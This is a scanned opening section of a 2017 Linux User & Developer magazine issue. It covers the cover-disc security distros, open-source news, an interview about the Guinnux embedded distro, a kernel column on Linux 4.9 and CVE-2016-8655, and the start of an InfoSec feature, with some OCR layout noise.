Page 1



•Intruder detection•Threat analytics•Malware screening

MONITOR SERVERS USING MUNIN Keep tabs on networks, servers and services


YOUR PI Get more from your GPIO pins now

How Erlang defines functions, atoms, tuples and more

MAKE A PI GAME Code your own egg drop game with the Pi and the SenseHAT


Which open source browser is the best?


» Inside Guinnux » Use your Pi as a warrant canary


Digital Edition


Discover vulnerabilities on your machine







to issue 174 of Linux User & Developer

Future Publishing Ltd Richmond House, 33 Richmond Hill Bournemouth, Dorset, BH2 6EZ +44 (0) 1202 586200 Web:

This issue


Editor April Madden

» Lock down your system » Power up your Pi » Understand exploits » Erlang explained 01202 586218

Senior Art Editor Stephen Williams Designer Rebekka Hearl Editor in Chief Dave Harfi eld Photographer James Sheppard Contributors Dan Aldred, Mike Bedford, Joey Bernard, Toni Castillo Girona, Sanne De Boer, Nate Drake, Tam Hanna, Oliver Hill, Phil King, Kushma Kumari, Jack Parsons, Swayam Prakasha, Richard Smedley, Jasmin Snook, Nitish Tiwari and Mihalis Tsoukalos Advertising Digital or printed media packs are available on request. Head of Sales Hang Deretz 01202 586442 Account Manager Luke Biddiscombe

International Linux User & Developer is available for licensing. Contact the International department to discuss partnership opportunities. Head of International Licensing Cathy Blackman +44 (0) 1202 586401

Subscriptions For all subscription enquiries: 0844 249 0282 Overseas +44 (0)1795 418661 Head of subscriptions Sharon Todd

☎ ☎

Circulation Circulation Director Darren Pearce 01202 586200

Production Production Director Jane Hawkins 01202 586200

Look for issue 17b5 on 9 Fe

er? Want it soon

e Subscrib ! y a tod

Management Finance & Operations Director Marco Peroni Creative Director Aaron Asadi Editorial Director Ross Andrews Printing & Distribution William Gibbons, 26 Planetary Road, Willenhall, West Midlands, WV13 3XT Distributed in the UK, Eire & the Rest of the World by Marketforce, 5 Churchill Place, Canary Wharf, London, E14 5HU 0203 787 9060

Distributed in Australia by Gordon & Gotch Australia Pty Ltd, 26 Rodborough Road, Frenchs Forest, New South Wales 2086 + 61 2 9972 8800

Welcome to the latest issue of Linux User & Developer, the UK and America’s favourite Linux and open source magazine. We all worry about security. As Linux users we have less chance of our personal machine being coopted into a botnet, but that doesn’t mean that if it picks something up it can’t merrily forward it on to its Windowsbased brethren. Then there are the risks inherent to networks and to the Internet of Things, many based on Linux but made up of mixed architectures. We can’t rely on Windows, Android or even Apple devices to look after themselves; we know how easy it can be to circumvent their protections. Only Linux offers the degree of lockdown and the testing tools we need to achieve a reasonable level of security for our machines, networks and data. We take an in-depth look at these tools and at pro techniques for using them on p18, and you’ll also find them on the disc that accompanies the magazine (digital edition readers can find them on our FileSilo repo). Meanwhile on p58 we’ll show you how to power up your Pi with some clever interfacing and electronic tricks. You’ll learn how to get more from your GPIO pins and how to work around power limits safely to supercharge your Pi projects. Plus the rest of the issue is packed with tutorials on security, programming, admin and more. Enjoy the issue! April Madden, Editor


The publisher cannot accept responsibility for any unsolicited material lost or damaged in the post. All text and layout is the copyright of Future Publishing Ltd. Nothing in this magazine may be reproduced in whole or part without the written permission of the publisher. All copyrights are recognised and used specifically for the purpose of criticism and review. Although the magazine has endeavoured to ensure all information is correct at time of print, prices and availability may change. This magazine is fully independent and not affiliated in any way with the companies mentioned herein. If you submit material to Future Publishing via post, email, social network or any other means, you automatically grant Future Publishing an irrevocable, perpetual, royalty-free licence to use the material across its entire portfolio, in print, online and digital, and to deliver the material to existing and future clients, including but not limited to international licensees for reproduction in international, licensed editions of Future Publishing products. Any material you submit is sent at your risk and, although every care is taken, neither Future Publishing nor its employees, agents or subcontractors shall be liable for the loss or damage.

© 2017 Future Publishing Ltd ISSN 2041-3270

Get in touch with the team: Facebook:

Linux User & Developer


Buy online


Visit us online for more news, opinion, tutorials and reviews:


Contents e Subscrib! e v & sa r 32

t ou Check ou fer! of great new ers om US cust ibe cr can subs on page 56

Reviews 81 Web browsers

Is Chrome still the cream of the crop when it comes to web browsing?

18 Lock down your system

Master InfoSec skills to secure and test systems and networks Midori




OpenSource Tutorials 08 News

The biggest stories from the open source world

12 Interview

John Eigelaar on the Guinnux distro

16 Kernel column

The latest on the Linux kernel with Jon Masters

34 Bash masterclass: Combine shell scripts and charts Transform your textual information into attractive diagrams with gnuplot and Bash

38 Analyse, adjust and run exploits in a controlled environment

Learn how exploits work and how you can use this knowledge against them

42 Monitor your network with Munin

Learn how to install and configure Munin on a Linux system to monitor networks

46 Program in Erlang: Functions

86 Solwise PL-1200AV2-PIGGY

Does this Powerline adaptor give you the internet speeds it promises?

88 Fedora 25

Can Fedora’s latest update turn the tables on the competition?

90 Free software

Richard Smedley recommends some excellent FOSS packages for you to try

Discover Erlang functions and basic Erlang data types

52 Manage user accounts in Ubuntu Learn how to effectively manage user accounts, permissions, groups and more


18 Lock down your system

57 Practical Raspberry Pi

Learn and apply essential InfoSec techniques

58 Secrets of Pi interfacing 96 Free downloads Get more from your GPIO pins and power up your Pi

Find out what we’ve uploaded to our secure repo FileSilo for you this month

Learn how to get more from your GPIO pins, build a Pi air drum, code an egg-drop game, set your Pi up as a tweeting warrant canary and set up a Pi photo frame

Join us online for more Linux news, opinion and reviews 4



99 4.


/month* excl. 20% VAT

Trusted Performance. Intel® Xeon® processors.

NEW 1&1 eliminates the "noisy neighbour effect": Ideal for beginners as a web and mail server, but also for more demanding projects like database applications, the new 1&1 Virtual Server Cloud is 100% yours to use! Take advantage now of the latest cloud technology. No shared resources through VMware virtualisation ■ Full root access ■ SSD storage ■ Unlimited traffic ■ High performance

Maximum security ■ Best price-performance ratio ■ 24/7 expert support ■ Choice between Linux/Windows ■ Plesk ONYX









0333 336 5509 * 1&1 Virtual Server Cloud S: £4.99/month. Billing cycle 1 month. Minimum contract term 12 months. No setup fee. Following the offer period, subsequent periods will be charged at the renewal price. Prices exclude 20% VAT. Visit for full product details, terms and conditions. Windows® and the Windows® logo are registered trademarks of Microsoft ® Corporation in the United States and/or other countries. 1&1 Internet Limited, Discovery House, 154 Southgate Street, Gloucester, GL1 2EX.

Open Source On the disc

On your free DVD this issue Find out what’s on your free disc Welcome to the Linux User & Developer DVD. This issue we’re all about InfoSec as we help you to test your security, lock down your systems and networks, and even explore a deliberately vulnerable VM to learn more

about threats and how to counter them. Inside our live booting distros you’ll also be able to access all the FOSS from our InfoSec feature and keep your systems and data completely watertight.

Featured software:

Kali Linux The ultimate security testing distro for Linux users will help you to make your system and network watertight. Use it to access the software in our InfoSec feature and to test your systems and networks for the ultimate in secure computing. Please note that the default login for the live boot edition of Kali Linux is username: root; password: toor.


A professional and hardened Linux firewall distribution that is secure, easy to operate and has great functionality. Please note that you will need to install IPFire from the live booting disc, so ensure that you have backed up all of your data and partitioned your drive before installing, to avoid losing any of your information or partitions.

Load DVD

To access software and tutorial files, simply insert the disc into your computer and double-click the icon.

Live boot

To live-boot into the distros supplied on this disc, insert the disc into your disc drive and reboot your computer.

Please note: • You will need to ensure that your computer is set up to boot from disc (press F9 on your computer’s BIOS screen to change Boot Options). • Some computers require you to press a key to enable booting from disc – check your manual or the manufacturer’s website to find out if this is the case on your PC. • Live-booting distros are read from the disc: they will not be installed permanently on your computer unless you choose to do so.

For best results: This disc has been optimised for modern browsers capable of rendering recent updates to the HTML and CSS standards. So to get the best experience we recommend you use: • Internet Explorer 8 or higher • Firefox 3 or higher • Safari 4 or higher • Chrome 5 or higher

Problems with the disc? Metasploitable

Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. As it is deliberately insecure, please make sure that you don’t store any of your sensitive or personal data on a partition or VM running Metaspoitable.


Send us an email at linuxuser@ Please note however that if you are having problems using the programs or resources provided, then please contact the relevant software companies.

Disclaimer Important information

Check this before installing or using the disc For the purpose of this disclaimer statement the phrase ‘this disc’ refers to all software and resources supplied on the disc as well as the physical disc itself. You must agree to the following terms and conditions before using this ‘this disc’:

Loss of data

In no event will Future Publishing accept liability or be held responsible for any damage, disruption and/or loss to data or computer systems as a result of using ‘this disc’. Future Publishing makes every effort to ensure that ‘this disc’ is delivered to you free from viruses and spyware. We do still strongly recommend that you run a virus checker over ‘this disc’ before use and that you have an upto-date backup of your hard drive before using ‘this disc’.


Future Publishing does not accept any liability for content that may appear as a result of visiting hyperlinks published in ‘this disc’. At the time of production, all hyperlinks on ‘this disc’ linked to the desired destination. Future Publishing cannot guarantee that at the time of use these hyperlinks direct to that same intended content as Future Publishing has no control over the content delivered on any of these hyperlinks.

Software Licensing

Software is licensed under different terms; please check that you know which one a program uses before you install it.

Live boot


Insert the disc into your computer and reboot. You will need to make sure that your computer is set up to boot from disc


Free and open-source software needs to be installed via the distros or by using the disc interface

Distros can be live booted so that you can try a new operating system instantly without making permanent changes to your computer


Alternatively you can insert and run the disc to explore the interface and content

• Shareware: If you continue to use the program you should register it with the author • Freeware: You can use the program free of charge • Trials/Demos: These are either time-limited or have some functions/features disabled • Open source/GPL: Free to use, but for more details please visit gpl-license Unless otherwise stated you do not have permission to duplicate and distribute ‘this disc’.


08 News & Opinion | 12 Interview | 96 FileSilo


Raspberry Pi gets a serious speed boost

Connectivity improvements could usher in a new wave of IoT developments We all know that the Raspberry Pi has long been heralded as the best single board computer made for public use, partially due to the continuous updates that have been implemented into it and its wallet-friendly price tag. One of the caveats, however, has long been its reliance on Wi-Fi connectivity, a specific problem for those looking to start developing for the Internet of Things. However, in a recent update, it has been announced that Raspberry Pi 3 owners will soon even be able to take full advantage of LTE connectivity on their units. It will soon be able to handle low-throughput cellular communications, a massive boost for development practices. Developing the chipset is Altair Semiconductor, previously known for its

Raspberry Pi 3 owners will soon even be able to take full advantage of LTE connectivity 8

developments in LTE chipsets, many of which have been implemented into everyday items. “We are dedicated to providing low-cost, highperformance computers to connect people, enable them to learn, solve problems and have fun,” said Eben Upton, CEO of Raspberry Pi (Trading) Ltd. “Altair has long been regarded as an LTE connectivity leader, and we are pleased to collaborate on this trial, which is the first of its kind. Users will only benefit by having the choice of using BT, Wi-Fi or LTE.” Due to the limitations involved with Wi-Fi networks, the addition of Altair’s LTE chipset should help provide wider and more flexible coverage. When implemented correctly, users will be able to stream high-definition video from anywhere, while also establishing connections with other applications and home automation products. The new chipset features downlink speeds of up to 10Mbps and offers extremely low power consumption, which blends in well with the Pi’s low-resource demands. It’s also completely software upgradable, with updates expected to help bridge the connection between

Above LTE connectivity will soon be a major part of the Pi

Pi and IoT devices even further. Also touted to be showcased in the chipset will be an advanced power management unit, a low power CPU subsystem and integrated DDR memory with a strong security framework. “The integration of Altair’s LTE chipset with Raspberry Pi makes it one of the most portable, affordable, and practical connectivity solutions on the market,” said Eran Eshed, co-founder and VP of worldwide sales and marketing at Altair. “More than 10 million Raspberry Pis have now been sold to date, and we’re pleased to debut this proof-of-concept to extend its range and value.” The integration of the chipset is said to be a gradual process, but if history is anything to go by, we can expect all units to be shipping with this option readily available in the first half of 2017. It’s likely we’ll also see the development of LTE brought forwards into all future models of the Raspberry Pi. If you’re not one of the 10 million owners of a Pi unit, you can head across to for all pricing and shopping options.


Best distros for ethical hacking practices

1 Kali Linux

Although it flies under the radar, Kali Linux comes with over 600+ pre-installed pen testing tools that majorly enhance your security toolbox. Tools are highly flexible and many are being updated regularly. Best of all, they can be easily implemented into different platforms, including both ARM and VMware.


Compiling code just got easier

2 Pentoo Linux

Based on Gentoo, Pentoo can be cleverly used on top of any existing Gentoo installation. Its array of tools vary from exploits to database scanners, equipping you with everything you need to put your security to the test.

The Red Hat Developer Toolset gets a major update Getting that combination of stable operating system with the latest developmental tools is never an easy feat, so it’s testament to Red Hat’s endeavours that its Developer Toolset is reaching its sixth major update. For those unaware, the Red Hat Developer Toolset’s primary aim is to help streamline application development by enabling developers to get hands on with the latest open-source C++ and C compilers profiling tools. Through these tools, developers can then compile applications and deploy them across multiple versions of Red Hat Enterprise Linux. A key part of this sixth update is its expansion into even more architectures. These include Red Hat Enterprise Linux on x86 systems, RHEL for z systems and the ARM Developer Preview of RHEL as well. Avid users will find new tools and updates to take advantage of that form the basis of the Developer Toolset and subsequent Red Hat Software Collection. The likes of PHP, Python, Ruby and MongoDB have all seen significant updates, while Git 2.9, the open-source version control system, makes its debut in the toolset.

Other new additions include the appearance of the Redis 3.2 and MySQL 5.7 open-source databases, as well as a new JVM monitoring tool in Thermostat 16. Eagle-eyed users will also find included the latest stable version of Eclipse Neon, an ideal solution for those interested in the latest tools within the Eclipse integrated development environment. Toolset-specific updates are also in abundance in order to really take this toolkit above and beyond what the competition offers. Both the GNU Compiler Collection and GNU Project Debugger have been updated to their latest versions, while numerous toolchain components and performance tools, namely Dyninst and Valgrind, have both been enhanced. In its current state, the toolset is available to all members of the Red Hat Developer Program, as well as those who currently have a select RHEL subscription. Later this year, a free RHEL developer subscription will also be included to those who have yet to make the plunge, but at the time of writing, it’s unknown what sort of terms this will be available under.

3 Parrot Security OS

One of the best things about Parrot is just how lightweight it is, making it a viable choice for those running old or slow hardware. It doesn’t skimp on features, however, and you’re bound to find every penetration tool you could possibly need.

4 DEFT Linux

As far as digital forensics go, you can’t look past DEFT Linux. It comes with a staggering amount of forensic tools, which are particularly tailored for penetration testers. It’s also based on Ubuntu, which helps in its customisation.

5 Caine

Caine is the best on this list when it comes to combining everyday distro applications, such as a browser and email client, with a highly complex forensic suite. It performs both functions well and can be run from either live or hard disk.



Your source of Linux news & views


SteamOS 2.97 fixes Steam Controller compatibility woes This latest updates provide essential bug fixes for gamers

Valve has recently launched the stable SteamOS 2.97 maintenance update, almost five months since its previous release, SteamOS 2.87. Behind the scenes, SteamOS is still in the development phase when it comes to being synchronised with the Debian stable repositories, but the latest 2.97 update bridges the gap further with the inclusion of BIND9, cURL and GStreamer Bad Plugins 1.0. Having both SteamOS and Debian in full sync will help guarantee that the gaming client will receive the newest security fixes that are also being implemented in the Debian operating system at the same time. In recent updates, Linux forums have been rife with compatibility issues regarding the Steam Controller, but new additions should help

Full sync will help guarantee that the gaming client will receive the newest security fixes

Above The Steam Controller now works flawlessly in SteamOS

put the issue to rest. A newly implemented X.Org server now ignores joystick devices, which in turn prevents controller and mouse inputs being confused for one another. Initial public feedback has shown this to be a big help for those suffering from the issue found in the previous beta clients. Under the hood, SteamOS 2.97 ships with an array of security updates for the libxslt, tsdata and GNU Tar packages, providing each with the latest in fixes and plugs. Lastly, firmware-ralink

packages have been re-introduced, which has helped the unattended upgrade functionality flourish once again. It was a sorely missed feature in previous beta updates, so we’re glad to see it back in action. Valve has gone on record to say that it highly recommends users update their SteamOS client to the latest 2.97 version as soon as possible. Those looking to update should head across to the Steam Universe group over at for all necessary installation images.


Microsoft and Google make open source commitments Although in recent months Microsoft has upped its game when it comes to supporting the world of open source, and to some degree Linux, it’s come to pass that it’s now officially the latest high-profile member of the Linux Foundation. Despite its long history in closedsource software, members of Microsoft have gone on record to say that the partnership will help the Redmond giant develop and deliver new mobile and cloud experiences to more people than ever before. Microsoft has recently

been praised for publishing source code repositories, a big step up from a few years ago, but even more impressive is its work when collaborating with the open source community. Recently it has been seeking community consensus in many key development projects, with consumer feedback helping to shape their open-source future. Just as surprising to some will be the announcement of Google joining the .NET Foundation as part of the ever-increasing

Even more impressive is its work when collaborating with the open source community 10

Steering Group. Despite Google’s interests in Java, the move is seen as a way for it to help improve .NET support for its own Google Cloud platform. Going forward, it’s unknown how Google will be able to help move .NET forward with its plans, especially when it comes to Google’s investments in the heavily Java-based Android platform. Could we expect to see Visual Studio make it over to Android at some point? Who knows… Both Microsoft and Google’s announcements may come as a surprise, but it’s testament to the developments in the open-source community that have helped pave the way for these mergers to take place.


Western Digital unveils Picompatible hard drive range Storage options are plentiful for Pi users around the world Western Digital has long been a pioneer in making storage more accessible for users all over the world. Its latest announcement sees the introduction of a new kit to help equip your Raspberry Pi with a hard drive storage solution. Named the WD PiDrive Foundation Edition, the hard drive comes equipped with a complete custom software build, closely based on the Raspbian OS and NOOBS OS installer. For end users, this combination provides a quick and simple installation of Raspbian PIXEL and Raspbian Lite onto the drive itself. The drive is to be offered in three capacity versions: a 64GB flash drive, a 250GB disk drive and 375GB disk drive. Both of the bigger capacity options will include a WD PiDrive cable, a unique cable that provides an optimal powering option for both the hard drive and Raspberry Pi simultaneously. Due to the increased space of a hard drive over a microSD card, the traditional storage option

Top 10

(Average hits per day, 15 Nov– 15 Dec) 1. 2. 3. 4. 5. 6. 7. 8. 9. 10.

Linux Mint openSUSE Debian Zorin Ubuntu Fedora Manjaro Elementary Deepin Antergos

2,629 1,708 1,707 1,374 1,324 1,298 1,271 881 862 806

This month ■ Stable releases (19) ■ In development (9)

for Pi users, WD has implemented an exclusive feature called Project Spaces. This allows for the installation of up to five core operating systems, partitioning areas of the hard drive off for each one, and empowering Pi users with a vast array of choices. Versions of the WD PiDrive start at just $18.99 over at the official site.


Node.js Foundation implements new security project The popular open-source application programming framework continues to grow In an attempt to consolidate and improve overall security levels in its ever-popular opensource programming framework, Node.js has implemented its own Node.js Security Project into the mix. The Node.js Security Project was initially set up to help collect information about vulnerabilities that Node users most commonly face. As a direct part of the Node.js Foundation, it’ll be used to help plug exploits and identify core weaknesses within the framework. Another major role of the Node.js Security Project is to help manage the module ecosystem


that the framework has been famed for. Over the past 12 months, the module system has nearly quadrupled in size, and as with any developments of this kind, security needs to be paramount. Forums have been rife with bugs, so this additional security layer could prove to be a game changer. It’s expected that the merge will be taking place over a certain amount of time and on a gradual basis, with security protocols being implemented throughout the framework and introduced to users fairly quickly.

The release of Fedora 25 has helped spark some major interest back into the distribution, with it gaining a new wave of users and enticing back those who had previously deserted it.

Highlights elementary OS

Despite the 0.4 Loki update being released over five months ago now, new users are still flocking over to elementary OS. Its combination of strong usability mixed in with great design is proving to be hard to match.


The 18.1 beta of Linux Mint has helped it maintain its spot at the top of the download list. Its biggest addition is a new screensaver with built-in playback controls; it’s pretty good!


It’s hard not to be impressed with what Fedora have achieved with the 25th update. Workstation in particular is fast becoming one of the premier distributions for new and seasoned users alike.

Latest distros available:



Your source of Linux news & views


A new face for Arch Guinnux makes Arch Linux woes a thing of the past. Founder John Eigelaar details how his revolutionary distribution took shape

John Eigelaar

is the founder and director of Keystone Electronic Solutions. Based in South Africa, he’s at the forefront of the Guinnux distribution, as well as a series of Guinnux-based hardware.

How long has Guinnux been in development for? Where did the original idea for it come from? Guinnux started in 2010 as a buildroot project. We soon realised the similarities between embedded installations and Linux server deployment in terms of their requirements and that it needed to be predominantly unattended. On top of that, we aimed to help promote a structured development environment. That’s where many of Guinnux’s aims were created. Furthermore, buildroot was not flexible enough to move away from uClibc and to deploy new solutions on top of existing frameworks. Deploying


new images instead of staged updates to sites is not viable when you have hundreds and thousands of sites. As you can imagine, keeping all of this development and the runtime environment in sync ended up becoming a full-time job. Since then, we’ve been able to enhance and build upon the principles that Guinnux was based on to the project and distribution you see today. For our readers who may be unaware of the Guinnux distribution, could you give us an overview of what it is and its key features? Keystone Electronic Solutions’ enterprise embedded Linux – dubbed Guinnux – is based on

Arch Linux ARM. It is developed and maintained by us and makes it easy to construct custom packages and solutions. It adopts the Arch Linux way of doing things, but with much-needed extras. Don’t get me wrong, there’s a lot of great things about Arch Linux, but it can be overly complicated when it really doesn’t need to be. So it was our aim to make it more accessible and considerably expand on its feature set. The Guinnux rescue file system allows users to boot into flash should the embedded system fail, and allows for simple system recovery – we’ve had a lot of positive feedback about this so far. The system can be recovered without having to reflash an image – a useful addition that saves more than just time! In fact, it is essential for enterprise deployments to recover and more surprisingly, it’s a feature that is often left out of many other enterprise-based distributions. Other features myself and the team have been working on include adapting the boot loader so users are able to boot kernels from any external file system. This allows for Keystone to distribute and upgrade kernel packages from anywhere and at any time, without interrupting service. Users can also find a ton of extra information about Guinnux over on our official Wiki page: doku.php. What makes Guinnux truly unique compared to other embedded Linux distributions? Guinnux is the first embedded GNU/Linux distribution that emulates the proven workflow of Enterprise Linux solutions. We’ve looked to blend all that is great with enterprise distributions – of which there’s a lot – with the core stabilities and improvements that we’ve introduced in Guinnux. Users will also find Guinnux as a headless enterprise embedded Linux distribution, but [it] still provides a mature and stable development environment for all our users. We’ve also looked to offer a comprehensive networking and protocol compatibility suite, something that many of our

Getting acquainted with the Guinnux Starter Kit The Guinnux Starter Kit aims to be a one-stop shop for everything you could possibly need to start developing with Guinnux. It serves as an entry point for the evaluation of both the runtime and development environments that Guinnux offers its users. The kit itself consists of a ARM9-based development board, a 5V external power supply and a microSD card for use with the board. This development board includes a number of IO interfaces, such as RS232 Serial, USB 1.1 Host, 10MB LAN and room for a IO expansion connector as well. Other specifications include 64MB SDRAM and battery backed RTC. The latest version of Guinnux comes pre-programmed onto the board, with the accompanying ext4 root file system booted and loaded onto the microSD card. Extra binary and system images are available for download from the official Guinnux site. By standard, the root file system contains every single core utility to remotely access and customise the Guinnux development board, so expect to things like the OPKG Package Manager and the openSSH server among others. Interested parties can get their hands on the Guinnux Start Kit over at



Your source of Linux news & views

competitors are traditionally slow at undertaking. Away from that, Guinnux also provides built-in system recovery and failsafe mechanisms as standard, as well as OTA updates with minimal downtime. For newer users, we’ve also made sure Guinnux works instantly out of the box, providing hassle-free deployment and a pre-installed standard web-based configuration interface. Our final standout option is the pacman package management system, which combines a simple binary package format with an easy-to-use build system. The goal of pacman is to make it possible to easily manage packages, whether they are from the official repositories or the user’s own package builds. How much of the distribution is core Arch Linux? Has there been a lot of modifications to it? Almost all of it is core Arch. We tied the core components together to allow for the development of enterprise solutions on top of the Arch Linux system. Our main focus was to allow more applications to be deployed onto the core. We added components that are expected from embedded distributions, such as a web config site and modules/libraries


Bringing Guinnux to the Pi One of the most interesting things that have come from the development of Guinnux is that it now works with a number of third-party boards. While there’s a lot of interest in porting Guinnux across to the Beagle Bone Black board, most users will want to familiarise themselves with the distribution on the Raspberry Pi. The availability of Guinnux on the Pi is done through a NOOBS OS image, but with a twist. Unlike other NOOBS images, Guinnux first installs the fall back rescue system, which in turn is then used to download and install the base Guinnux packages. For end users, this keeps download and install times to an absolute minimum. Of course, users also have the option to download the NOOBS image directly onto an SD card and install Guinnux that way, but the process is vastly more complicated. Once the Guinnux and Pi partnership is complete, users can then get stuck into a full configuration web interface, which can be tailored to meet your exact needs, and help optimise what the Pi can handle.

to control embedded hardware. As I mentioned previously, Arch can be a tricky distribution to get your head around, so we wanted to make it a more appealing proposition to potential new users. We’d like to think we’ve made a good job of that. We heard that your team made some changes to the Build tool within Arch Linux. What sort of changes were these? We made the makepkg utility (among others) cross-compile compatible. This differs from the usual approach of performing clustered builds. The produced packages are also seamlessly integrated into the toolchain through a modified pacman utility, such that one manages their toolchain as they would manage a normal distribution. Your site also shows some Guinnux-based hardware, are these good choices for both

We’re always looking at new ways we can entice new users to potentially try out Guinnux

new and advanced Linux users? Are they more relevant to companies or makers? Guinnux is well suited to our own Blue Penguin board as this was the main development platform for Guinnux. The Blue Penguin module is field-tested and is used in multiple enterprise solutions. They are perfect for companies who want to produce a serious industrial-strength embedded platform. However, we also recognise that there is a market for makers, and that is why we ported Guinnux to the Raspberry Pi and we are currently also porting it to the Beagle Bone Black board. We’re always looking at new ways we can entice new users to potentially try out Guinnux, so being able to implement into other boards is a big part of that. Hopefully we can continue to port it across to other avenues in the near future. What do you see as the future of Guinnux going forward? How active do you think the development cycle will be? Guinnux will continue to keep up with the mainstream Linux distributions to keep the embedded environment close to the PC environment. This greatly improves the development experience. Releases are planned to occur annually, depending on the changes we feel need to be implemented at the time. We are constantly adding features as we require them, and we welcome the Linux community to join in development over on our website and forums.



Your source of Linux news & views


The kernel column

Jon Masters summarises the latest happenings in the Linux kernel community

Jon Masters

is a Linux-kernel hacker who has been working on Linux for some 19 years, since he first attended university at the age of 13. Jon lives in Cambridge, Massachusetts, and works for a large enterprise Linux vendor, where he is driving the creation of standards for energy efficient ARM-powered servers


Linus Torvalds announced the release of the 4.9 Linux kernel, noting that it “is the biggest release we’ve ever had, at least in number of commits.” In fact, the numbers aren’t even close. With over 16,000 changesets (3,000 more than the previous cycle), Linux 4.9 is the biggest kernel in some time. Each of those changesets represents a group of patches, many of which will have had a number of iterations and reviews during development. All of which well explains why Linus decided to wait an extra week after a (rare) RC8 before pushing the final kernel out the door. The latest kernel includes a number of new features that we have covered in previous issues, including support for Intel’s Memory Protection Keys, and Andy Lutomirski’s work on Virtually Mapped Kernel Stacks. The latter will increase resiliency in the kernel against a number of corner case problems, such as overflowing the (fixed size) kernel stack with extremely rare code paths, or some of the more obscure forms of security compromise. In fact, CONFIG_VMAP has already lead to a number of additional cleanups, including better support for virtual address debug, and the identification of a longstanding bug in the kernel’s handling of old fashioned 32-bit only x86 processors during processor exceptions. Meanwhile, Intel’s Memory Protection Keys aim to guard against certain forms of buffer overflow and other security problems, while also providing a means to isolate certain sensitive memory regions (such as those containing private keys used for cryptography). Other features in 4.9 include the usual raft of driver updates, including support for the greybus subsystem as used by the (discontinued) Google Ara project that we have covered previously as well. Finally, a hardware latency detector originally hacked together many years ago by this author (since rewritten more cleanly by another) to diagnose problems with real time Linux systems has finally been merged (see the new hwlat tracer). Linus originally had intended for the 4.9 kernel to be released a week earlier, but by 4.9-rc6 he was hinting at a potential delay. This was confirmed when he added an (unusual) 4.9-rc8, noting that things had not yet calmed down enough for him to be confident in a final release. All of this means that timing for Linux 4.10 will be awkward to say the least, with the merge window closing on Christmas Day. Linus did note, however, that this is “a

pure technicality, because I will certainly stop pulling on the 23rd at the latest, and if I get roped into Christmas food prep, even that date might be questionable.”

More security exploits

Three more critical security issues affecting the Linux kernel have been announced over the past month. The most serious of these was CVE-2016-8655, ‘Linux af_packet.c race condition (local root)’, in which a carefully crafted sequence of software calls into the unprivileged namespaces code (used by containers on many distributions) could be used to cause the kernel to perform a “use after free” type access to memory under the control of the attacker, and thus cause escalation of privilege to that of the root user. The original discovery of this problem was reported by Philip Pettersson, who noted that he “found the bug by reading code paths that have been opened up by the emergence of unprivileged namespaces, something I think should be off by default in all Linux distributions.” Many of these namespace changes have been made in the interest of supporting Linux containers, but some of these changes have broken previous assumptions that particular operations were privileged, and thus perhaps less subject to the kind of code audit that Philip has undertaken here. On the face of it, we seem to be experiencing a wave of security bugs affecting the Linux kernel these days. But in part, this is because such exploits now often come with memorable, cute sounding names, blogs, Twitter handles, and corporate PR teams keen to promote their service of discovering the problem to begin with. This drives greater attention to security (which isn’t necessarily a bad thing). At the same time, Linux is now an incredibly enticing target for those up to mischief (or just out for a PR opportunity). In many ways, there is more to be gained from compromising Linux than there is in compromising Windows or Mac OS, in terms of high value targets.

Heterogeneous memory management

One of the more interesting trends in hardware is toward sharing memory between devices and system applications processors (CPUs) in more homogenous and transparent ways. The utopia that we are all hoping will come soon is in the form of coherently

attached devices that participate in system-wide cache coherency protocols and become instantly aware of any changes made to memory by any other agent or processor within the machine. When we reach this eventual stage of evolution, it will (theoretically) be possible to build software abstractions that treat code running on GPUs, FPGAs, and other accelerators attached to a machine as if they’re regular processes. But we’re a little way away from utopia today. Until quite recently, data shared between GPUs (as an example) and system RAM had to be quite explicitly managed, with many extraneous copies of large areas (buffers) of memory as they were passed back and forth. Some of the latest hardware on the market greatly improves the status quo. For example, Nvidia’s Pascal GP100 supports the ability to trigger page faults in unified memory shared between the GPU and system. This means that the kernel can maintain a consistent mechanism to manage memory, whether it is system RAM or device graphics memory, using the standard page table abstraction to translate from the virtual addresses used by software (applications on the host Linux system, and code running on the GPU) to underlying physical memory that might be located in RAM, or on the GPU. Because devices like the GP100 can trap on a fault, they can allow the kernel to manage and coordinate ownership behind the scenes. This is a feature that is leveraged by the HMM (Heterogenous Memory Management) patch series from Jérôme Glisse to provide a generic kernel mechanism. The code has been under development for several years (since at least 2014) but there was some resistance to merging it before the upstream maintainers could see real-world hardware use cases involving it. There are now several devices shipping that can leverage HMM, including both the Nvidia Pascal, as well as the Mellanox CX5 network adapter cards. The latest version of the patch series (v14) seems to be very close to a final form. The question is whether the presence of shipping hardware, and the endorsements of those building it, will allow this now to be finally merged.

The future of third-party driver support

Linux is famous in developer circles for several fundamental tenets. One of these is that “you don’t

break userspace”. Another is that “there is no kernel ABI”. The latter means that, unlike other proprietary (and some other open source) Operating Systems, Linux doesn’t guarantee stable internal interfaces between the components inside the kernel (as opposed to those visible to applications). This is the reason that those who use proprietary graphics drivers on Linux must update them every time a new upstream kernel is released, for example. The kernel doesn’t guarantee that the interfaces needed for drivers won’t change radically from one release to the next. Any such changes are typically viewed as being self-contained and impacted code is usually updated whenever other infrastructure changes are made within the Linux kernel source. Yet for many years, a compromise situation has existed in which a Linux kernel could be build with MODVERSIONS support. This is a feature that allows the kernel to automatically determine the interfaces used by a driver and (at a broad level) whether they remain compatible with those provided by the currently running kernel. This feature is often used in the commercial Linux distributions, which use this to provide limited support for third-party drivers, or updates that didn’t ship with the OS. A recent change to the upstream Linux kernel intending to allow the use of EXPORT_SYMBOL (a macro used to make kernel functions available across the kernel) within assembly code broke kernel module versioning due to a problem with the assembler (binutils) used in compiling the Linux kernel. A workaround was merged for 4.9 but it lead to a debate in which Linus said, “Some day I really do want to remove MODVERSIONS entirely. Sadly, today does not appear to be that day.” It will be interesting to see what, if anything, directly replaces the functionality required to use third-party (even open source) drivers if that day does come.



Lock down your system

Download and use some of the most popular security tools and distros to probe and secure your network within minutes



TRIAD Confidentiality

When discussing InfoSec, it is a given that private data should be just that. Confidentiality encompasses obvious steps to keep data safe such as storing it offline, encryption and use of 2FA (two-factor authentication). Confidentiality also pertains to people. Anyone with access to sensitive data should be trained to avoid security risks by choosing strong passwords, being aware of getting hacked themselves through social engineering, and having clear privacy guidelines to follow.



